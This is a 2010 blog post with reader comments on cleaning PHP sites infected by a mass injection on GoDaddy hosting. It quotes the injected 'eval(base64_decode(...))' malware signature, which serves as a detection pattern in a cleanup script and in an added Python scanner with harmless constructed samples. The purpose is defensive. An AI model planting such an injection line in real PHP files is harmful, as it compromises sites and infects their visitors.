Godaddy hacked again. Another way to cure your site.

May 17, 2010


Godaddy got hacked again this morning (This is what Godaddy has to say about it). Update: and again on May 20. And again on September 18 and September 21.

If you host your blog on Godaddy, you would do well to check your site regularly for any malware, and here is how.

The hack is the same as the previous 4 hacks, affecting thousands of sites: a one-liner of malware code is inserted at the top of every single .php file on your site, starting with:

<?php /**/ eval(base64_decode("goobledegoob"))

I described before how to cure it, but here is another, slightly more sophisticated way: it first lists the infected files, prompts you to continue, deletes the one-liner malware from all of your .php files, and then lists the cured files. It is inspired by a script written by Andy Stratton in this post.
Running the script, even on a large site, takes only about half a minute.

The script works not only for Godaddy + WordPress, but for any PHP-based site (I used it this morning to cure a Drupal site) on any host.

The script is also a quick way to find out if your site is actually infected. Just run it as described below. If there are no infected files, it will say so and won’t prompt to cure anything.

Here are the right steps to follow:

  1. Make a backup of your site first, just to be safe. There are many tools to do so, but a “brute force” copy of your entire blog directory to your local computer using an FTP tool like Filezilla works fine.
  2. Download this zip file. It contains a file called “fixfiles.php”. Extract it and store it on your computer.
    (Ok, no zipfile? Here is the fixfilesphp.txt version. Save it as fixfiles.php)
  3. FTP the “fixfiles.php” file to the root directory of your blog. In GoDaddy, that is the /HTML directory (which also contains index.php, wp-login.php etc..):
    GoDaddy Root Directory

    If you only want to clean a subdirectory (and the tree beneath it), put the file in that subdirectory instead, and remember that the command in the next step has to reflect that.

  4. Then run the script by opening this URL in your browser:

    http://yoursite.com/fixfiles.php

    or

    http://yoursite.com/subdir/fixfiles.php

    if you put the script in a subdirectory.

  5. The script will first scan your files for the malware code, in the directory where it was placed and in all directories beneath it.
    If you get the message:

    0 Infected Files in ./

    …then your site is clean.
    If any malware is found, the script will list the infected files and prompt you to fix them:

    Malware found - fix the files

    Click on “Fix Files”, then click OK on the prompt to proceed:

    Prompt to fix malware
    The script will scan through all files again, and clean the malware. It will list all files that were cleaned.

    Malware scan finished

  6. Delete the “fixfiles.php” file from your site after execution.
  7. If you are using a caching plug-in, don’t forget to CLEAR YOUR CACHE, otherwise the malware will continue to be served to your users, even though you cleaned your .php code.
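As an added example (this is not the post's fixfiles.php, and it is Python rather than PHP), here is the same scan-then-fix procedure from steps 4 and 5, meant to be run locally on the backup copy you made in step 1 or on a host that gives you shell access. It lists the infected files first (the default is a dry run) and rewrites them only when called with --fix. It removes only the matched injection rather than the whole first line, so a variant that is glued to the file's own opening tag without a line break keeps that tag, and a changed signature can be passed in with --signature. The sample files it writes for the demo are constructed, not real infected files.

```python
"""Added example, not the post's fixfiles.php: list and strip the one-liner
injection from every .php file under a directory, as steps 4 and 5 describe."""
import argparse
import os
import re
import sys
import tempfile

# The injected one-liner as the post describes it: the file STARTS with
#   <?php /**/ eval(base64_decode("...")); and may continue with ?> on that line.
# The base64 blob is matched generically so a changed payload still matches; if
# the wrapper itself changes, pass another regex via --signature (assumption:
# anything else, e.g. injected iframes, is out of scope here).
DEFAULT_SIGNATURE = (
    rb'^<\?php\s*/\*\*/\s*eval\(base64_decode\("[A-Za-z0-9+/=]*"\)\);'
    rb'[ \t]*(?P<close>\?>)?[ \t]*\r?\n?'
)


def strip_injection(content, signature=DEFAULT_SIGNATURE):
    """Return (cleaned_bytes, changed). Only the matched text is removed, never
    the whole first line, so the no-line-break variant keeps its opening tag."""
    match = re.match(signature, content)
    if not match:
        return content, False
    rest = content[match.end():]
    closed = match.groupdict().get('close') is not None
    if not closed and not rest.lstrip().startswith(b'<?php'):
        # No ?> and no <?php follows: the injection took over the original
        # opening tag, so the remaining code is still PHP and needs it back.
        rest = b'<?php\n' + rest
    return rest, True


def php_files(root):
    """Yield every .php file below root; unreadable directories are reported
    and skipped (cf. the opendir warning in the comments), not fatal."""
    def report(err):
        print(f'warning: cannot read {err.filename}: {err.strerror}', file=sys.stderr)
    for dirpath, _dirs, files in os.walk(root, onerror=report, followlinks=False):
        for name in files:
            if name.lower().endswith('.php'):
                yield os.path.join(dirpath, name)


def find_infected(root, signature=DEFAULT_SIGNATURE):
    """Sorted root-relative paths of .php files that start with the signature."""
    infected = []
    for path in php_files(root):
        with open(path, 'rb') as fh:
            if re.match(signature, fh.read()):
                infected.append(os.path.relpath(path, root).replace(os.sep, '/'))
    return sorted(infected)


def clean_tree(root, signature=DEFAULT_SIGNATURE, fix=False):
    """List infected files; with fix=True also rewrite them (back up first)."""
    infected = find_infected(root, signature)
    if fix:
        for rel in infected:
            path = os.path.join(root, *rel.split('/'))
            with open(path, 'rb') as fh:
                cleaned, _changed = strip_injection(fh.read(), signature)
            with open(path, 'wb') as fh:
                fh.write(cleaned)
    return infected


def build_sample_site(root=None):
    """Write a CONSTRUCTED sample tree (not real infected files); return root."""
    root = root or tempfile.mkdtemp(prefix='fixfiles-demo-')
    os.makedirs(os.path.join(root, 'sub'), exist_ok=True)
    injected = b'<?php /**/ eval(base64_decode("ZXhpdDs=")); '  # blob is "exit;"
    samples = {
        'a.php': injected + b'?>\n<?php\necho "a";\n',  # line-break variant (post)
        'sub/b.php': injected + b'echo "b";\n',         # no line break (comments)
        'e.php': injected + b'?><html>hi</html>\n',     # HTML-first template file
        'sub/c.php': b'<?php\necho "c";\n',             # clean file
        'sub/d.txt': injected + b'\n',                  # not .php, so ignored
    }
    for rel, data in samples.items():
        with open(os.path.join(root, *rel.split('/')), 'wb') as fh:
            fh.write(data)
    return root


def main(argv=None):
    parser = argparse.ArgumentParser(description='list or strip the one-liner injection')
    parser.add_argument('root', nargs='?', default='.')
    parser.add_argument('--fix', action='store_true', help='rewrite files (default: list only)')
    parser.add_argument('--signature', help='alternative regex for the injected code')
    args = parser.parse_args(argv)
    signature = args.signature.encode() if args.signature else DEFAULT_SIGNATURE
    hits = clean_tree(args.root, signature, fix=args.fix)
    for rel in hits:
        print(('fixed ' if args.fix else 'infected ') + rel)
    print(f'{len(hits)} infected files in {args.root}')
    return len(hits)


if __name__ == '__main__':
    main()
```

Run it as `python fixfiles.py /path/to/backup` to list, then again with `--fix` once the list looks right; the second listing mirrors the "0 Infected Files" check in step 5. The `?>` test in strip_injection is what keeps an HTML-first template from having a spurious `<?php` prepended, while a file whose own opening tag was swallowed by the injection gets it restored.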

All of that is “curing” the problem. I have looked everywhere, but have yet to find a way to “avoid” the infection. It looks like the hackers found a loophole in Linux shared hosts (and not just those on Godaddy) in combination with PHP vulnerabilities, which the hosting companies have been unable to identify and/or close.

Until such time, scan your sites regularly, and cure the problem immediately before your visitors get infected.

Picture courtesy Owning Pink

{ 36 comments… read them below or add one }

Clive at BlogBriefing.com May 17, 2010 at 19:44

Many thanks for this.

Thankfully I’ve only ever used GoDaddy as a Domain registrar service, and not used their hosting (although I recognize the fact that it’s not just them being infected but that they are a principal target) but this ‘fix’ will be very useful for my readers who have not been so fortunate in their hosting provider decisions.

Hostgator seem to be doing something right though, as their clients have not so far been affected – but maybe they have yet to be targeted!

I contacted my hosting provider in Europe who assures me that they are monitoring the situation closely and learning any security lessons that they find might need addressing.

Reply

Peter May 17, 2010 at 20:04

Hi Clive,

Thanks.. I looked at Hostgator.. Indeed they seem to have been saved from the latest hacks. What was not clear, though, was if their packages include the installation services as Godaddy has where Drupal, Wordpress etc.. can be installed by a click of a button.
I am pretty savvy manipulating Drupal and WP, but am absolutely ignorant at system level, so “auto install” would be a must for me.

Another question: have you ever tried their auto-migrate services where they take an existing site and domain and migrate it to their hosting service for free?

thanks,

Peter

Reply

Peter May 17, 2010 at 22:47

Sorry, leaving an answer to one of my question: It seems hostgator uses Fantastico to install 3rd party applications…

So that leaves the question if anyone ever tried their migration services?

Peter

Reply

Jon Marks May 18, 2010 at 23:06

Thanks! I used your script to temporarily bring my site back to life. I’m also sick to death of GoDaddy. Slow, unstable and now this. If you fancy a GoDaddy rant …

http://jonontech.com/2010/05/18/godaddy-godaddy-you-bastards-im-through/

Reply

Peter May 19, 2010 at 01:40

Glad it helped, Jon!
I am looking for a Godaddy alternative myself… Not too happy about it either…

Peter

Reply

Matthew October 17, 2011 at 21:34

I’ve been happy with Media Temple. I had moved all of my sites over there except for the one that got infected (on godaddy). http://thecompleteself.com

I’m implementing your fix as we speak. If all goes well, you will no longer see a blocked site. next I need to ask Google to recheck the site.

Thanks,

matthew

Reply

Ted May 21, 2010 at 23:14

Thanks for your time and script too. I ran it on two of my gd hosted sites and they were both ok. Would have taken a lot longer to do it manually.

Reply

JaykGrey May 22, 2010 at 06:02

“(Ok, no zipfile? Here is the fixfilesphp.txt version. Save it as fixfiles.txt)”

Do you mean “fixfiles.php”?

Reply

Peter May 22, 2010 at 12:43

Sorry, my mistake… Correct: save it as “fixfiles.php”

Peter

Reply

John Soares May 27, 2010 at 19:06

I hope I’ll avoid the attacks now that I’ve left Godaddy and moved all of my Wordpress sites to Hostgator.

My fingers are crossed…

Reply

Peter May 27, 2010 at 19:09

John,

I am seriously contemplating to move too… Did they do the migration for you, or did you move everything yourself?

Peter

Reply

Chris Merriman June 8, 2010 at 08:29

Hostgator (basically the same as bluehost) are normally helpful with their live chat tech support. A request to enable shell access (required a scan of photo ID) was sorted within an hour.

However, all my sites were attacked in the same way as listed above, (around May 19th I think) so I don’t think that their security is necessarily better than godaddy’s, using this attack as evidence.

Finally, I’d recommend using their simplescripts service over fantastico, as WP upgrades are made available more quickly, and is a little more flexible.

Reply

Aaron June 8, 2010 at 22:36

I ran this test and got this script, am i in the green or is my site infected?

Warning: opendir(./\_db_backups\) [function.opendir]: failed to open dir: No such file or directory in D:\Hosting\4769296\html\fixfiles.php on line 35
0 Infected Files in ./

Reply

Peter June 9, 2010 at 07:13

Hi Aaron:

  • Looks like the script could not open the directory “_db_backups” (which is typically where the hosting company puts the backups of your SQL database). Would it be possible the directory was deleted while the script ran? Does that directory exist; can you see it with FTP? I guess re-running the script gives the same error message, does it? Can it be opened? (On my site, the directory has the file protection value 705.)
    Apart from this error opening that particular subdirectory, it looks like indeed your site is not infected.
  • If you want to double-check, You can always put the script in a subdirectory, eg \wp_content and run it from there as http://yoursite.com/wp_content/fixfiles.php… Know that then, ONLY that subdirectory (and other directories beneath it) will be checked/cured, and not the whole site.

P.

Reply

Wendy September 18, 2010 at 01:49

They got my site too. A call to Godaddy and they said *I* must have loaded something bad on my site, and they knew NOTHING of it nor were they at fault. They wouldn’t acknowledge any problem after going to my website. This fixed it right up. Thank you so much!!!

Reply

Peter September 18, 2010 at 08:28

You are welcome.

As a hint: when I have a problem which I suspect to be caused by a problem others might also be experiencing, like GoDaddy hosting, I do a quick Twitter search on that subject. There’s a big chance you’re not the first one, if it is a common problem.
E.g. a Twitter search on “Godaddy” last night revealed just how massive the hacking was (again).
With that data at hand, there is no way their support can send you off with a dumb message like they gave you…

PS: On Twitter, @Godaddy was quick to confirm they were being hacked.

Reply

Amanda September 18, 2010 at 04:04

I am confused as to what to do. I added the zip to my HTML root directory but how do I do the rest?

Reply

Peter September 18, 2010 at 08:37

Ciao Amanda.

Please follow the instructions step by step.
As per instructions:
- Download the zip file onto your computer.
- It contains a file called “fixfiles.php”. Extract it and store it on your computer.
- Save it as fixfiles.php
- FTP the “fixfiles.php” file to the root directory of your blog.
- in your browser, type the url “http://www.yoursite.com/fixfiles.php

Let me know if you still have problems.

Peter

Reply

Raj September 18, 2010 at 23:08

Here is another nice and quick fix ..

http://alltips.in/how-to-fix-godaddy-malware-attack.html

Reply

SidMizard September 20, 2010 at 17:41

Great solution, it works on godaddy

Reply

Bravo September 21, 2010 at 10:13

you hit me on twitter letting me know how to fix my site

just got hit AGAIN, and looks like this site did too

so heads up

Reply

BlogTipss November 8, 2010 at 15:28

I think GoDaddy is good place to buy and sell domains but most worst place to get hosting service.

Reply

Bren FM November 12, 2010 at 00:15

Howdy!

just migrated a site from GoDaddy to Hostgator and this little beasty came along for the ride. Your script is SUPER helpful, ta… but one thing to note – the latest mutation features whacking the php code into the first line but NOT using a line break… so your script has not only stripped out the malicious code but the opening php tag on EVERY php script on my Joomla site. Not getting at you about it, as I appreciate the help… just thought you’d like to know so maybe you could adjust your code!

Reply

Peter November 25, 2010 at 20:08

Hi Bren,

Sorry for the trouble.. It seems indeed that the newest virus does not leave that empty line.
Let me see what I can do to adapt the code!

Would it be possible to email me an infected .php file to test?

Peter (at) theroadtothehorizon (dot) org

Reply

Danny Diaz March 29, 2011 at 16:48

Thanks a million for this. I got hit by the same type of thing this weekend on a GoDaddy shared server, though they’re moving to a strategy of embedding a single-line Javascript URL forwarder into the first line of _almost_ every file named, “index.php”. The script provided on this page only needed minor tweaks to detect and remove the current strain of attack, thanks a lot for this.

Reply

Dave May 16, 2011 at 18:41

Hi, this fix looks great, this is attacking my sites again now, but I’m not been able to remove the code with your fix. What could I change to make it work? I’m on Hostmonster, not Goddady. Thanks! The code I get now is:

eval(base64_decode(“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”));

Reply

Peter May 17, 2011 at 18:29

Hi Dave,

I have answered you via Email.. The problem is that indeed the code signature keeps on changing, so also the “fix” code should be adapted…

Reply

Umer July 2, 2011 at 10:42

Hi,

I’ll have to say that your solution is a cure not the prevention.

I myself am a PHP expert and I have seen the script of fixfiles.php. It only searches for “<?php /**/ eval(base64_decode(” in the beginning of the file and if it finds it, it lists that as a reported file. But there are so many other kinds of malware lines which get inserted at the beginning of the file, e.g. "” and iframes also get inserted. This script won’t cure them unless we modify the script a little bit for those conditions as well.

One can set this file execution using cron job and run it daily so whenever the site gets attacked, fixfiles script will fix that. But again, it will just be a cure not prevention.

Godaddy is not that cause of it, there are many other sites hosted on other servers like hostgator, bluehost which are facing the same problem.

A simple solution is to re-upload a fresh copy of your script to the server. But still there are situations where this doesn’t help e.g. if the virus is in the database or in a plugin/extension etc.

I am working on it to find the permanent cure, will get back once done.

Thanks,
Umer

Reply

Peter July 2, 2011 at 16:26

@Umer: I fully agree with you on all accounts. It is a cure. And only a cure for the first batch of mass-infections, which happened about a year ago. Since then the infection “signatures” have changed.. Should be easy to change that in the script. If I were a PHP programmer, I’d love to make a script that prompts for the signature.

True too that this script only cures infected .php files, for base64-signatures. There are many other ways a site can get infected.

True too, this is curing, and prevention would be better. I covered a couple of those in another post, but none of them is water-tight.
At the time of the first mass infections, the hackers clearly got in via Godaddy, and got hold of FTP login credentials. Changing the credentials helped many. But the leak did not come from the sites themselves, but from the hosting service (e.g. I never use FTP, only SFTP)…

If you ever come up with a more flexible way to cure, and a more watertight way to prevent, I’d be happy to write a post about it. (And you would help many people along the way too!)

best,
Peter

Reply

Chris Raymond August 10, 2011 at 23:12

Peter,
I have tried to upload this to the root directory at my GD Wordpress site, via Transmit, and the file never appears, just files that begin with .pureftpd-upload. followed by a long string of digits. Files that I now cannot delete.

Is this good news, i.e., GD is preventing me from uploading executable php at root?

Reply

Peter August 10, 2011 at 23:41

[edit: sorry got confused on which blogpost this comment was made... thought it was on the post to avoid malware being uploaded via .jpg files... My mistake... so forget what I wrote below.]

Chris,
No, that is not exactly how it works. Some content management systems allow users to upload files e.g. avatars. If a hacker would do that, and know where the file is stored (and hide php code in the uploaded file), and execute it, then he is in.
So you’d have to mimic a user on your site.

To simulate it, though, you can transfer the file to your site using FTP, and then execute it from the directory where you uploaded it.

hope this helps,

Peter

Reply

Peter August 11, 2011 at 00:38

Chris, I will answer via email directly

Reply

Dawn January 9, 2012 at 19:26

Hi – I tried it – it says 0 files, but I know that I have the base64 hacks in the files. So I’m not sure why it’s saying none… :(

Reply

Peter January 9, 2012 at 19:43

Dawn,

The cleanup routine is based on the hacking code “signature” from 2 years ago.
it is looking for any file where the FIRST line starts with:

<?php /**/ eval(base64_decode(

Check the .php files on your server and see which base64 code the hackers have put in your files. IF the hacked files contain a string on the FIRST line of your .PHP file, but it does not match the above search criteria, you need to copy that piece of code and put it into my cleanup routine. Has to be an exact copy.

If your site is hosted by a commercial hosting provider, it might be good to contact their support and ask them to look at your files, and if possible cure them. As we are now 2 years after the first of these hacks came in, most hosting providers have cleanup scripts now... Might be a safer option for you, as in the meantime, hackers have diversified their hack and now inject other code in other places.

If your site was hacked through the timthumb backdoor, you will cure it in yet another way (again, your hosting provider should be able to help you)

Let me know if you need further assistance!

Peter

Reply

Danny Diaz January 9, 2012 at 20:58

We actually found that if you’ve got multiple base64 signatures in your code, you need to look for an auto-generation script in your code. Our Joomla code was riddled with base64 and javascript redirection code, and we eventually found the auto-generation script that was embedded in our Joomla code to randomly insert the hacked code in-place. It was an impressive piece of code, I should have kept it around, it did char/ascii translation from a huge string that was ascii encoded (and didn’t throw any red flags).

Good luck.
-Danny

Reply

Peter January 9, 2012 at 21:10

Glad you were able to cure it, Danny.

“When it all started”, I mean this code injection on a massive scale, two years ago, it was simple to cure, as it was just one piece of code injected at the first line of the .php file. You cured that, secured your site (if they did not get in through a backdoor of a shared server itself) and you were done.. But now, this type of hacking got more sophisticated. With the Timthumb backdoor, I saw how the hackers’ script had found one old timthumb script, and must have “tagged” it, as in the weeks to come, they tried to inject one file with a bit of code. Once they did that, again, they must have flagged it “that they got in”, they executed that code, which did a whole series of operations on my site. They actually created an entire subsite (in a /subdirectory), which was a PC virus injector (infected anyone who visited that subsite).
The moment they had that site set up, they sent out a spam email to a massive list of people, directing them to that subsite.

I got to know about it, as someone went to my actual site, found the “contact me” details and emailed me, warning of the infection. I was able to clean it all up in a few hours, but in the meantime, Google had already banned that subsite as malicious (I admit, they were really quick), and at the same time, secured the email spamming-backdoor from my domain.

I think the time when we webmasters could say “Oh it won’t happen to me” is over. The hacking attempts are on such a massive scale, and play so close on the ball, that the moment a vulnerability is discovered, within the next days their servers start searching for sites with that vulnerability already.

Wish us luck, protecting one’s site will only become more and more difficult.

Peter

Reply
